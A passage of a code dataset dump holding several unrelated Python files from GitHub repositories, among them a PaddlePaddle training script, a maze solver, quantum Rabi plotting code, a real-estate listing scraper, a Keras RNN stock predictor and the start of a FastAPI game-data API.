json.load(open(data_file_path.strip(), mode='r', encoding='utf-8')):\n                        sample_result = self._get_feed_iterator(dic, need_input, need_label)\n                        if sample_result is None:\n                            continue\n                        yield tuple(sample_result)\n            elif os.path.isfile(data_path):\n                for dic in json.load(open(data_path.strip(), mode='r', encoding='utf-8')):\n                    sample_result = self._get_feed_iterator(dic, need_input, need_label)\n                    if sample_result is None:\n                        continue\n                    yield tuple(sample_result)\n\n        return reader\n\n    def get_train_reader(self, need_input=False, need_label=True):\n        \"\"\"Data reader during training\"\"\"\n        return self.path_reader(self._train_data_path, need_input, need_label)\n\n    def get_test_reader(self, need_input=True, need_label=True):\n        \"\"\"Data reader during test\"\"\"\n        return self.path_reader(self._eval_data_path, need_input, need_label)\n\n    def get_dict_size(self, dict_name):\n        \"\"\"Return dict length\"\"\"\n        if dict_name not in self._feature_dict:\n            raise ValueError(\"dict name %s not found.\" % (dict_name))\n        return len(self._feature_dict[dict_name][0])\n\ndef train(data_reader, use_cuda=True):\n\n    char = fluid.layers.data(name='char_data', shape=[1], 
dtype='int64', lod_level=1)\n word = fluid.layers.data(name='word_data', shape=[1], dtype='int64', lod_level=1)\n postag = fluid.layers.data(name='token_pos', shape=[1], dtype='int64', lod_level=1)\n\n target = fluid.layers.data(name='target', shape=[1], dtype='int64', lod_level=1)\n\n feature_out = my_model.db_lstm(data_reader, char, word, postag)\n # feature_out = mymodel.db_lstm(char)\n\n mix_hidden_lr = 1e-3\n crf_cost = fluid.layers.linear_chain_crf(\n input=feature_out,\n label=target,\n param_attr=fluid.ParamAttr(name='crfw', learning_rate=mix_hidden_lr))\n avg_cost = fluid.layers.mean(crf_cost)\n\n # optimizer\n sgd_optimizer = fluid.optimizer.AdamOptimizer(learning_rate=1e-3)\n\n sgd_optimizer.minimize(avg_cost)\n\n crf_decode = fluid.layers.crf_decoding(input=feature_out, param_attr=fluid.ParamAttr(name='crfw'))\n\n train_batch_reader = paddle.batch(\n paddle.reader.shuffle(data_reader.get_train_reader(), buf_size=8192),\n batch_size=500)\n\n place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()\n\n feeder = fluid.DataFeeder(feed_list=[char, word, postag, target], place=place)\n # feeder = fluid.DataFeeder(feed_list=[char, target], place=place)\n exe = fluid.Executor(place)\n\n def train_loop(main_program):\n exe.run(fluid.default_startup_program())\n\n for epoch_id in range(50):\n cost_sum, cost_count = 0.0, 0.0\n for data in train_batch_reader():\n cost = exe.run(main_program, feed=feeder.feed(data), fetch_list=[avg_cost])[0]\n cost_sum += cost\n cost_count += 1\n print(\"Epoch \", epoch_id, \",Train cost:\", cost_sum / cost_count)\n\n train_loop(fluid.default_main_program())\n\nif __name__ == '__main__':\n data_generator = RcDataReader(\n charemb_dict_path='../dict/char_dict',\n wordemb_dict_path='../dict/word_dict',\n postag_dict_path='../dict/postag_dict',\n label_dict_path='../dict/label_dict',\n train_data_path='../data/train_data.json',\n eval_data_path='../data/train_data.json')\n\n train(data_generator)\n","repo_name":"qchj20131252/financial_event_extraction","sub_path":"bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11049641899","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef readMaze():\n file_name = sys.argv[1]\n f = open(file_name, 'r')\n maze = f.read().split('\\n')\n f.close()\n for line in maze:\n if len(line) == 0:\n maze.remove(line)\n return maze\n\n\ndef findStart(maze):\n for i in [0, -1]:\n if ' ' in maze[i]:\n return (maze[i].index(' '), maze.index(maze[i]))\n for line in maze:\n for i in [0, len(line) - 1]:\n if line[i] == ' ':\n return (i, maze.index(line))\n\n\ndef findGoal(maze, start):\n for i in [0, -1]:\n if ' ' in maze[i] and \\\n (maze[i].index(' '), maze.index(maze[i])) != start:\n return (maze[i].index(' '), maze.index(maze[i]))\n for line in maze:\n for i in [0, len(line) - 1]:\n if line[i] == ' ' and (i, maze.index(line)) != start:\n return (i, maze.index(line))\n\n\ndef findPath(maze, start):\n direction = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n queue = [[start]]\n checked = set(start)\n way = []\n while queue:\n path = queue.pop(0)\n last_x, last_y = path[-1]\n if (last_x, last_y) == findGoal(maze, start):\n way.append(path)\n\n for d in direction:\n x, y = last_x + d[0], last_y + d[1]\n if (\n 0 <= x < len(maze[0]) and 0 <= y < len(maze) and\n maze[y][x] != '*' and (x, y) not in checked\n ):\n queue.append(path + [(x, y)])\n checked.add((x, y))\n return way\n\n\nif len(sys.argv) != 2:\n raise 
IOError('No file included.')\navailable = set()\nmaze = readMaze()\nstart = findStart(maze)\npath = findPath(maze, start)\nfor i in path:\n for ele in i:\n available.add(ele)\nfor y in range(len(maze)):\n for x in range(len(maze[y])):\n if (x, y) not in available and maze[y][x] == ' ':\n maze[y] = maze[y][:x] + '*' + maze[y][x+1:]\nfor i in maze:\n print(i)\n","repo_name":"imdangodaane/dead_end","sub_path":"dead_end.py","file_name":"dead_end.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14868295958","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\n\n#def DQRabi_frqdiff(t, rabi, detun):\n# #rabi *= 2*np.pi\n# detun *= 2*np.pi\n# alpha = (2**0.5)*rabi*(2*np.pi)\n# k = (alpha**2 + 4*detun**2)**0.5\n\n# term1 = (4*detun**2*((alpha**2*(k - 2*detun)**2)/(alpha**2 - 2*(k - 2*detun)*detun)**2 + (alpha**2*(k + 2*detun)**2)/((alpha**2 + 4*detun**2)*(alpha**2 + 4*detun*(k + 2*detun))))*np.cos((k*t)/2))/(alpha**2 *(1 + (4*detun**2)/alpha**2))\n# term2 = (alpha**4*(k - 2*detun)**4)/(4*(alpha**2 - 2*(k - 2*detun)*detun)**4) + (16*detun**4)/(alpha**4 *(1 + (4 *detun**2)/alpha**2)**2) + (alpha**4 *(k + 2 *detun)**4)/(4 *(alpha**2 + 4* detun**2)**2 *(alpha**2 + 4 *detun *(k + 2 *detun))**2)\n# term3 = (alpha**4 *(k**2 - 4 *detun**2)**2 *np.cos((k *t)))/(2 *(alpha**2 -2* (k - 2* detun)* detun)**2 *(alpha**2 + 4* detun**2)* (alpha**2 + 4* detun* (k + 2* detun)))\n\n# return (term1+term2+term3), term1, term3, term2\n\n#def DQRabi_frqdiff(t, rabi, detun):\n# detun *= 2*np.pi\n# alpha = (2**0.5)*rabi*(2*np.pi)\n# k = (alpha**2 + 4*detun**2)**0.5\n#\n# term1 = np.cos((k *t))*alpha**4/2/((alpha**2 + 4*detun**2)**2)\n# term2 = np.cos((k *t/2))*8*alpha**2 * detun**2 /((alpha**2 + 4*detun**2)**2)\n# term3 = (alpha**4 + 32*detun**4)/2/((alpha**2 + 4*detun**2)**2)\n\n# return (term1+term2+term3), term2, term1, term3\n\n\ndef DQRabi_frqdiff(t, sqrabi, detun):\n detun *= 2*np.pi\n sqrabi *= 2*np.pi\n \n freqwd = ((2*detun**2 + sqrabi**2)/2)**0.5\n return ((2*detun**2 + sqrabi**2 * np.cos(freqwd * t))/(2*detun**2 + sqrabi**2))**2\n\ndef get_DQhalfpi(rabi, detun):\n alpha = (2**0.5)*rabi*(2*np.pi)\n k = (alpha**2 + 4*(detun*2*np.pi)**2)**0.5\n t = np.linspace(0, 2*np.pi*10/k, 10000)\n termtot = DQRabi_frqdiff(t, rabi, detun)\n idx_mins = find_peaks(termtot*(-1))[0]\n t_mins = t[idx_mins]\n pop_mins = termtot[idx_mins]\n #plt.plot(t_mins, pop_mins, 'o')\n #plt.plot(t, termtot, ':')\n #plt.show()\n \n return t_mins\n\ndef DQRabi_frqcomm(t, rabi, detun):\n rabi *= 2*np.pi\n detun *= 2*np.pi\n k = (2*rabi**2 + detun**2)**0.5\n\n denom = detun**2 + 2*rabi**2\n numer = rabi**2 + detun**2 + (rabi**2)*np.cos(k *t)\n\n return numer/denom\n\n\n\n\n\n# \n# Delete - redundant ABC comparisons\n#\ndef make_ABCplots():\n import seaborn as sns\n plotpalette = sns.hls_palette(16, l=.4, s=.8).as_hex()\n\n arr_SQrabi = np.linspace(0.1, 5, 1000)\n arr_terms = []\n for rabi in arr_SQrabi:\n termfinal, B, A, C = DQRabi_frqdiff(0, rabi, 1.515)\n arr_terms.append(np.asarray([termfinal, A, B, C]))\n arr_terms = np.array(arr_terms)\n\n fig, axs = plt.subplots(3)\n fig.suptitle('$A, B, C$ for Various Drive Strengths $\\Omega$\\n Differential Detunings $\\Delta= 1.515$ MHz', fontsize = 25)\n\n #axs[0].plot(arr_SQrabi, arr_terms[:,0], 'rx:', label='$|c_0(t)|^2$')\n\n axs[0].plot(arr_SQrabi, arr_terms[:,1], '-', c=plotpalette[0], lw=3, label='$A$')\n axs[0].set_ylabel('$A$', fontsize=20)\n 
axs[0].axvline(2.14, c= 'k', ls=':', lw=2, label = '$\\Omega_F = 2.14$ MHz')\n axs[0].legend(loc=4, fontsize=16)\n\n axs[1].plot(arr_SQrabi, arr_terms[:,2], '-', c=plotpalette[0], lw=3, label='$B$')\n axs[1].set_ylabel('$B$', fontsize=20)\n axs[1].axvline(2.14, c= 'k', ls=':', lw=2)\n axs[1].legend(loc=4, fontsize=16)\n\n #axs[2].plot(arr_SQrabi, arr_terms[:,3], 'k-', lw=2, label='$C$')\n #axs[2].set_ylabel('$C$', fontsize=20)\n #axs[2].axvline(2.14, c= 'k', ls=':', lw=2)\n #axs[2].legend(loc=4, fontsize=16)\n #axs[2].set_xlabel('Drive Strength $\\Omega$', fontsize=20)\n\n axs[2].plot(arr_SQrabi, arr_terms[:,1]-arr_terms[:,2]+arr_terms[:,3], 'k-', lw=3, label='$A-B+C$')\n axs[2].axvline(2.14, c= 'k', ls=':', lw=2)\n axs[2].legend(loc=4, fontsize=16)\n axs[2].set_xlabel('Drive Strength $\\Omega$', fontsize=20)\n\n for ax in axs:\n ax.label_outer()\n fig.tight_layout()\n fig.subplots_adjust(top=.84)\n\n plt.savefig('./Figures/Magic Rabi Paper Plots/ABC.png', dpi=100, bbox_inches='tight')\n\n plt.show()\n\n#arr_t = np.linspace(0,.5,100)\n#arr_detunings = np.array([1.515])#np.linspace(0, 10, 11)\n#for idx_detun in np.arange(arr_detunings.size):\n# plt.figure(idx_detun)\n# rabi = 2.15\n# detuning = arr_detunings[idx_detun]\n# termfinal, term1, term2, term3 = DQRabi_frqdiff(arr_t, rabi, detuning)\n# plt.plot(arr_t, termfinal, 'k--', lw=2, label='DQ Rabi')\n# plt.axvline(get_DQhalfpi(rabi, detuning)[0], c='r', lw=2, label = '$t_1$')\n# plt.axvline(get_DQhalfpi(rabi, detuning)[1], c='b', lw=2, label = '$t_2$')\n \n# #termfinal, term1, term2, term3 = DQRabi_frqdiff2(arr_t, 2.15, detuning)\n# #plt.plot(arr_t, termfinal, 'rx:', label='total')\n# #plt.plot(arr_t, term1, '--', label='term 1')\n# #plt.plot(arr_t, term2*np.ones(arr_t.size), ':', label='term 2')\n# #plt.plot(arr_t, term3, '-.', label='term 3')\n# plt.ylim([0,1])\n# plt.xlabel('Pulse Duration ($\\mu s$)', fontsize=20)\n# plt.ylabel('$m_s = 0$ Population', fontsize=20)\n# str_title = 'DQ Rabi \\n'\n# str_title += 'Driving Amp: ' + str(round(rabi, 4)) + ' MHz, '\n# str_title += 'Detunings: $\\pm$' + str(round(detuning, 4)) + ' MHz'\n# plt.title(str_title , fontsize = 25)\n# #plt.savefig('./difdetun/' + str(int(idx_detun)) + '.png',dpi=100)\n# plt.legend(loc=3, fontsize=15)\n# #plt.close()\n# plt.show()\n# #plt.close()\n\n","repo_name":"jstangnv/NV_HyperfineDriving","sub_path":"BaseScripts_by_JJ/dqdifdetun.py","file_name":"dqdifdetun.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41592924101","text":"import csv\n\n# Average income\n# income = 0\n# with open(\"C:/images/csv/Emp.csv\") as rfp:\n# lines = rfp.readlines()\n# for line in lines[1:]:\n# line = line.strip()\n# line = line.split(',')\n# income += int(line[-1])\n#\n# print(income / (len(lines)-1))\n\nwith open(\"C:/images/csv/Emp.csv\") as rfp:\n reader = csv.reader(rfp)\n headerList = next(reader)\n sum = 0\n count = 0\n for cList in reader:\n sum += int(cList[3])\n count += 1\n avg = sum // count\n print(avg)\n\n\n","repo_name":"Roasters/ComputerVision","sub_path":"09- CSV 01.py","file_name":"09- CSV 01.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543909231","text":"def check(S):\n for s in S:\n if s == -1:\n return False\n return True\n\n\nt = int(input())\nfor i in range(1, t + 1):\n raw = [str(s) for s in input().split(\" \")]\n S = list(raw[0])\n S = [-1 if s == 
'-' else 1 for s in S]\n    K = int(raw[1])\n\n    flip = 0\n    index = 0\n    for useless_i in range(len(S)):\n        if index + K > len(S):\n            flip = flip if check(S) else 'IMPOSSIBLE'\n            break\n\n        cur = S[index]\n        if cur == -1:\n            for ii in range(K):\n                try:\n                    S[index + ii] = -1 * S[index + ii]\n                except Exception:\n                    pass\n            index += 1\n            flip += 1\n        else:\n            index += 1\n\n    print(\"Case #{}: {}\".format(i, flip))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2595.py","file_name":"2595.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15655551483","text":"\ndef get_even_lines_from_text_file(file_name):\n    with open(file_name) as file:\n        lines = file.readlines()\n        result = [lines[i][:-1] for i in range(len(lines)) if i % 2 == 0]\n\n    return result\n\n\ndef replace_special_chars_with_at_symbol(lines):\n    for i in range(len(lines)):\n        for char in special_chars:\n            if char in lines[i]:\n                lines[i] = lines[i].replace(char, special_symbol)\n\n\ndef change_word_order(lines):\n    result = [line.split()[::-1] for line in lines]\n    return result\n\n\ndef format_lines(lines):\n    replace_special_chars_with_at_symbol(lines)\n    result = change_word_order(lines)\n\n    return result\n\ndef print_result(lines):\n    for line in lines:\n        print(\" \".join(line))\n\nspecial_chars = [\"-\", \",\", \".\", \"!\", \"?\"]\nspecial_symbol = \"@\"\nlines = get_even_lines_from_text_file(\"text.txt\")\nformatted_lines = format_lines(lines)\nprint_result(formatted_lines)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"File-Handling/Exercises/01. even_lines.py","file_name":"01. even_lines.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11198649134","text":"from bs4 import BeautifulSoup\r\nfrom Constants import ELEMENTS_POST as EP, TYPE_OF_DEAL as TOD, RE_SELL, RE_RENT, URL_RENT, URL_SELL, URL_BASE\r\nimport urllib.request\r\nfrom datetime import datetime\r\nimport re\r\nimport threading\r\n\r\n\r\ndef address(street: str):\r\n    \"\"\"\r\n    Takes a street address and divides it into two parts - street name and\r\n    number.\r\n    \"\"\"\r\n    try:\r\n        return [re.findall(\"(.+) [0-9]+\", street)[0], re.findall(\".+ ([0-9]+)\", street)[0]]\r\n    except IndexError:\r\n        return [re.findall(\"(.+) .+\", street)[0], \"NA\"]\r\n\r\n\r\ndef reformat_date(d: str):\r\n    \"\"\"\r\n    Reformat date from DD.MM.YYYY to YYYY-MM-DD\r\n    \"\"\"\r\n    return f\"{d.split('.')[2]}-{d.split('.')[1]}-{d.split('.')[0]}\"\r\n\r\n\r\nclass RealEstate:\r\n    \"\"\"\r\n    Stores data about an apartment.\r\n    \"\"\"\r\n    def __init__(self, method: str, **kwargs):\r\n        \"\"\"\r\n        method:\r\n        'FromLink': must contain keyword argument 'link' which is SS.lv URL.\r\n        'Manual': all fields about apartment entered manually. 
Keyword\r\n arguments expected: price (float), size (float), street (str),\r\n strnum (str), district (str), series (str),\r\n link (str), typeofdeal (str value 'rent' or 'sell'),\r\n amenities (str), upload_date (str), import_date (str), floor (int),\r\n building (str)\r\n \"\"\"\r\n self.import_date = str(datetime.now())[:10]\r\n if method == \"FromLink\":\r\n self.link = kwargs[\"link\"]\r\n soup = BeautifulSoup(urllib.request.urlopen(self.link).read(), \"html.parser\")\r\n self.typeofdeal = TOD[soup.find_all(name=\"h2\", attrs={\"class\": \"headtitle\"})[0].get_text().split(\"/\")[-1].strip()][1]\r\n self.price = self.pricetag(soup.find_all(name=EP[\"Price\"][\"Tag\"], attrs={\"id\": EP[\"Price\"][\"id\"]})[0].get_text())\r\n self.size = float(soup.find_all(name=EP[\"Size\"][\"Tag\"], attrs={\"id\": EP[\"Size\"][\"id\"]})[0].get_text().split(\"m\")[0].replace(\" \", \"\"))\r\n self.series = soup.find_all(name=EP[\"Series\"][\"Tag\"], attrs={\"id\": EP[\"Series\"][\"id\"]})[0].get_text()\r\n self.district = soup.find_all(name=EP[\"District\"][\"Tag\"], attrs={\"id\": EP[\"District\"][\"id\"]})[0].get_text()\r\n self.street = address(soup.find_all(name=EP[\"Street\"][\"Tag\"], attrs={\"id\": EP[\"Street\"][\"id\"]})[0].get_text().replace(\" [Karte]\", \"\"))[0]\r\n self.strnum = address(soup.find_all(name=EP[\"Street\"][\"Tag\"], attrs={\"id\": EP[\"Street\"][\"id\"]})[0].get_text().replace(\" [Karte]\", \"\"))[1]\r\n try:\r\n self.amenities = soup.find_all(name=EP[\"Amenities\"][\"Tag\"], attrs={\"id\": EP[\"Amenities\"][\"id\"]})[0].get_text()\r\n except IndexError:\r\n self.amenities = \"NA\"\r\n self.upload_date = reformat_date(soup.find_all(name=\"td\", attrs={\"class\": \"msg_footer\", \"align\": \"right\"})[0].get_text()[8:18])\r\n self.floor = int(soup.find_all(name=EP[\"Floor\"][\"Tag\"], attrs={\"id\": EP[\"Floor\"][\"id\"]})[0].get_text().split(\"/\")[0])\r\n try:\r\n self.building = soup.find_all(name=EP[\"Building\"][\"Tag\"], attrs={\"id\": EP[\"Building\"][\"id\"]})[0].get_text()\r\n except IndexError:\r\n self.building = \"NA\"\r\n elif method == \"Manual\":\r\n self.price = kwargs[\"price\"]\r\n self.size = kwargs[\"size\"]\r\n self.street = kwargs[\"street\"]\r\n self.strnum = kwargs[\"strnum\"]\r\n self.district = kwargs[\"district\"]\r\n self.series = kwargs[\"series\"]\r\n self.link = kwargs[\"link\"]\r\n self.typeofdeal = kwargs[\"typeofdeal\"]\r\n self.amenities = kwargs[\"amenities\"]\r\n self.upload_date = kwargs[\"upload_date\"]\r\n self.floor = kwargs[\"floor\"]\r\n self.building = kwargs[\"building\"]\r\n\r\n def per_sqm(self):\r\n \"\"\"\r\n Calculates price per square meter.\r\n \"\"\"\r\n return round(self.price / self.size, 5)\r\n\r\n def pricetag(self, price_des: str):\r\n \"\"\"\r\n Extracts the exact price from price description, e.g. '50 000 €'\r\n and returns as an integer value.\r\n \"\"\"\r\n if self.typeofdeal == \"rent\":\r\n if \"€/mēn.\" not in price_des:\r\n raise ValueError(\"Invalid pricetag for typeofdeal RE_RENT. Tag '€/mēn.' 
not found.\")\r\n return float(price_des.split(\"€/mēn.\")[0].strip().replace(\" \", \"\"))\r\n elif self.typeofdeal == \"sell\":\r\n return float(price_des.split(\"€\")[0].strip().replace(\" \", \"\"))\r\n\r\n\r\ndef find_all_rows(bs: BeautifulSoup):\r\n \"\"\"\r\n bs: BeautifulSoup object containing table with apartments\r\n https://www.ss.lv/lv/real-estate/flats/riga/all/hand_over/pageXX.html\r\n return value: tuple containing id attribute for all relevant tags.\r\n Each id points to an apartment posting.\r\n \"\"\"\r\n plain_text = bs.prettify(encoding=\"utf-8\")\r\n return re.findall(\"tr_[0-9]+\", str(plain_text))\r\n\r\n\r\ndef get_links(typeofdeal: int):\r\n \"\"\"\r\n Gathers all available links for:\r\n typeofdeal 0: apartments for sale, 1: apartments for rent\r\n \"\"\"\r\n if typeofdeal not in [RE_SELL, RE_RENT]: return -1\r\n base_url = URL_RENT if typeofdeal == RE_RENT else URL_SELL\r\n return_list = []\r\n page = 1\r\n end_of_data = False\r\n while not end_of_data:\r\n # print(f\"Collecting links from page {page}...\")\r\n current_url = f\"{base_url}page{str(page)}.html\" if page != 1 else base_url\r\n table_soup = BeautifulSoup(urllib.request.urlopen(current_url), \"html.parser\")\r\n rows = find_all_rows(table_soup)\r\n for row in rows:\r\n # print(list(table_soup.find_all(name='tr', attrs={'id': row})[0].children)[-1].get_text())\r\n if typeofdeal == RE_RENT and '€/mēn.' not in list(table_soup.find_all(name='tr', attrs={'id': row})[0].children)[-1].get_text():\r\n continue\r\n return_list.append(f\"{URL_BASE}{table_soup.find_all(name='tr', attrs={'id': row})[0].find_all(name='a')[0]['href']}\")\r\n next_page = table_soup.find_all(name=\"a\", attrs={\"class\": \"navi\"})[-1][\"href\"]\r\n try:\r\n page = int(re.findall(\"page([0-9]+)\\.html\", next_page)[0])\r\n except IndexError:\r\n end_of_data = True\r\n return return_list\r\n\r\n\r\ndef get_data(links: list, re_list: list, **kwargs):\r\n \"\"\"\"\r\n Takes a list of links and creates RealEstate objects.\r\n links: a list containing links to specific post in SS.\r\n re_list: a list that will hold the RealEstate objects created by this method.\r\n **kwargs: optional arguments for updating the status of current data import in real time. 
Use either both or none\r\n of the arguments below.\r\n total: total number of links to be processed\r\n status_info: a dictionary containing key 'ImportProgress'\r\n \"\"\"\r\n try:\r\n update_status = True if \"total\" in kwargs and \"status_info\" in kwargs and \"ImportProgress\" in kwargs[\"status_info\"] else False\r\n except KeyError as keyerror:\r\n print(keyerror)\r\n update_status = False\r\n for url in links:\r\n try:\r\n re_list.append(RealEstate(\"FromLink\", link=url))\r\n except ValueError:\r\n continue\r\n if update_status:\r\n kwargs[\"status_info\"][\"ImportProgress\"] = round(len(re_list)/kwargs[\"total\"]*100, 2)\r\n # print(f\"Progress: {str(kwargs['status_info']['ImportProgress'])}, {str(len(re_list))} / {str(kwargs['total'])}\")\r\n\r\n\r\ndef get_data_quickly(typeofdeal: int, threads: int, **kwargs):\r\n \"\"\"\"\r\n A threaded version of get_data which equally distributes all SS links among the number of threads specified.\r\n typeofdeal: 0 (sell) or 1 (rent)\r\n threads: number of threads to distribute the workload\r\n **kwargs: optional arguments for updating the status of current data import in real time.\r\n status_info: a dictionary containing key 'ImportProgress'\r\n return_list: an existing list outside of this method to store RealEstate objects\r\n \"\"\"\r\n update_status = True if \"status_info\" in kwargs else False\r\n return_list = []\r\n thread_list = []\r\n all_links = get_links(typeofdeal)\r\n links_per_thread = len(all_links) // threads\r\n remainder = len(all_links) % threads\r\n for t in range(threads):\r\n end_pos = links_per_thread * (t + 1)\r\n if t + 1 == threads:\r\n end_pos += remainder\r\n if update_status:\r\n thread_list.append(threading.Thread(target=get_data, args=(all_links[links_per_thread * t:end_pos], return_list), kwargs={\"status_info\": kwargs[\"status_info\"], \"total\": len(all_links)}))\r\n else:\r\n thread_list.append(threading.Thread(target=get_data, args=(all_links[links_per_thread * t:end_pos], return_list)))\r\n for t in thread_list:\r\n t.start()\r\n for t in thread_list:\r\n t.join()\r\n if \"return_list\" in kwargs:\r\n kwargs[\"return_list\"] = return_list\r\n else:\r\n return return_list\r\n\r\n\r\ndef export_to_txt(source: list, filename: str):\r\n \"\"\"\r\n Export source list of RealEstate objects to a text file.\r\n \"\"\"\r\n with open(f\"{filename}.txt\", \"w+\", encoding=\"utf-8\") as OutputFile:\r\n OutputFile.write(\"Price\\tSize\\tStreet\\tStrNum\\tDistrict\\tSeries\\tLink\\tImportDate\\tTypeOfDeal\\tAmenities\\tUploadDate\\tFloor\\tBuilding\\n\")\r\n for i in source:\r\n OutputFile.write(f\"{str(i.price)}\\t{str(i.size)}\\t{str(i.street)}\\t{str(i.strnum)}\\t{str(i.district)}\\t{str(i.series)}\\t{str(i.link)}\\t{str(i.import_date)}\\t{str(i.typeofdeal)}\\t{str(i.amenities)}\\t{str(i.upload_date)}\\t{str(i.floor)}\\t{str(i.building)}\\n\")\r\n\r\n\r\ndef import_from_txt(filename: str):\r\n \"\"\"\r\n Creates a list of RealEstate objects from a text file.\r\n Text file should be tab delimited and should contain the following header:\r\n Price\\tSize\\tStreet\\tStrNum\\tDistrict\\tSeries\\tLink\\tImportDate\\tTypeOfDeal\\tAmenities\\tUploadDate\\tFloor\\tBuilding\\n\r\n \"\"\"\r\n return_list = []\r\n with open(f\"{filename}.txt\", \"r\", encoding=\"utf-8\") as SourceFile:\r\n source_list = SourceFile.read().split(\"\\n\")\r\n for i in range(1, len(source_list)-1):\r\n split_line = source_list[i].split(\"\\t\")\r\n return_list.append(RealEstate(\"Manual\", price=split_line[0], size=split_line[1], 
street=split_line[2], strnum=split_line[3], district=split_line[4], series=split_line[5], link=split_line[6], typeofdeal=split_line[8], amenities=split_line[9], upload_date=split_line[10], floor=split_line[11], building=split_line[12]))\r\n return return_list\r\n","repo_name":"baumanis/RealEstateFeed","sub_path":"RealEstateFeed.py","file_name":"RealEstateFeed.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15065483716","text":"import yfinance as yf \nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nimport warnings \nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.layers import Dense, SimpleRNN\nfrom sklearn.model_selection import KFold\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom keras.models import Sequential\nfrom keras.callbacks import EarlyStopping\nimport tensorflow as tf\n\nwarnings.filterwarnings('ignore')\n\ngoog = yf.Ticker('GOOGL')\ngoog_6y = goog.history(period='6y')\n\n# Data that I want to focus on are 'Open','High','Low','Closing', and Volume\ngoog = goog_6y.iloc[:,0:5]\n\n# Diagnose whether there are null data \ngoog.isnull().sum()\n\n\n# This time, let's divide data into train and test. The train ratio is 0.7\ntrain_ratio = 0.7\ntrain_len = int(train_ratio * goog.shape[0])\ntrain_stock = goog[:train_len]\ntest_stock = goog[train_len:]\n\n# Do scaling train data by using MinMaxScaler \ntrain = train_stock.copy()\nscalers = {}\nfor i in train_stock.columns:\n scaler = MinMaxScaler(feature_range=(-1,1))\n s_s = scaler.fit_transform(train[i].values.reshape(-1,1))\n scalers['scaler_'+i]=scaler\n train[i] = s_s\n\n# Likewise, do scaling test data too\ntest = test_stock.copy()\nfor i in train_stock.columns:\n scaler = scalers['scaler_'+i]\n s_s = scaler.transform(test[i].values.reshape(-1,1))\n test[i] = s_s\n\n# Next, the below function is for making time series data. 
\ndef split_series(series, n_past,n_future,target_col=list(range(len(goog.columns)))):\n X, y = list(), list()\n for window_start in range(len(series)):\n past_end = window_start + n_past\n future_end = past_end + n_future\n if future_end > len(series):\n break\n past, future = series[window_start:past_end,:], series[past_end:future_end,target_col]\n X.append(past)\n y.append(future)\n return np.array(X), np.array(y)\n\nn_features = train.shape[1] # 5 \nn_past = 22\nn_future = 1\n\nX_train, y_train = split_series(train.values,n_past,n_future, target_col=goog.columns.get_loc('Close'))\n\ntest_rnn = pd.concat([train[-n_past:],test])\n\n\nX_test, y_test = split_series(test_rnn.values, n_past,n_future, target_col=goog.columns.get_loc('Close') )\n\n\ndef build_rnn(n_neurons):\n model = Sequential()\n model.add(SimpleRNN(units=n_neurons, activation='tanh', input_shape=(n_past, n_features)))\n model.add(Dense(1, activation='tanh'))\n model.compile(loss='mse',optimizer=tf.keras.optimizers.RMSprop(0.001), metrics=['mse'])\n return model\n\nkfold = KFold(n_splits = 3)\n\nn_neurons = [10, 20, 30]\nparam_grid = dict(n_neurons=n_neurons)\n\nmodel_candi = KerasRegressor(build_fn = build_rnn)\ngrid_rnn = RandomizedSearchCV(estimator=model_candi, cv=kfold, param_distributions=param_grid)\n\ngrid_rnn.fit(X_train, y_train, epochs=50, batch_size=20, verbose=0)\n\nbest_rnn = grid_rnn.best_estimator_\n\nes = EarlyStopping(monitor='val_loss', mode='min', patience=5)\nhistory_rnn = best_rnn.fit(X_train, y_train, epochs=50, batch_size=20, validation_split=0.2, callbacks=[es],\n verbose=0)\n\ntrain_mse = history_rnn.history['mse']\nvalid_mse = history_rnn.history['val_mse']\n\nplt.plot(train_mse, label='train mse')\nplt.plot(valid_mse, label='validation mse')\nplt.ylabel('mse')\nplt.xlabel('epoch')\nplt.legend(loc='upper center', bbox_to_anchor=(0.5,-0.15), fancybox=True, shadow=False, ncol=2)\n","repo_name":"minhokg/RNN_Google_Stock","sub_path":"Simple_RNN_Google.py","file_name":"Simple_RNN_Google.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13583874824","text":"from fastapi import FastAPI\nfrom fastapi.responses import RedirectResponse, FileResponse\nfrom fastapi.concurrency import run_in_threadpool\nfrom fastapi.openapi.docs import get_swagger_ui_html\nfrom fastapi_utils.tasks import repeat_every\nimport main\nimport models\nimport uvicorn\nimport uvloop\nimport asyncio\nimport aiofiles\nimport json\nimport logging_setup\nimport urllib.request\n\ndescription = \"\"\"\nThe Skyblock Tools api tries to put all information a hypixel dev using the api would need at their fingertips\n## Items\nProvides an interface to **see all data about all items, data for a specific item or specific data generally.**\nCreate an issue on github (https://github.com/QuintBrit/Skyblock-Tools/issues) if you need help or run into an error!\n\"\"\"\n\ntags_metadata = [{\n \"name\":\n \"items\",\n \"description\":\n \"Operations dealing with ✧・゚individual items✧・゚\"\n}, {\n \"name\":\n \"constants\",\n \"description\":\n \"Constant lists of things, 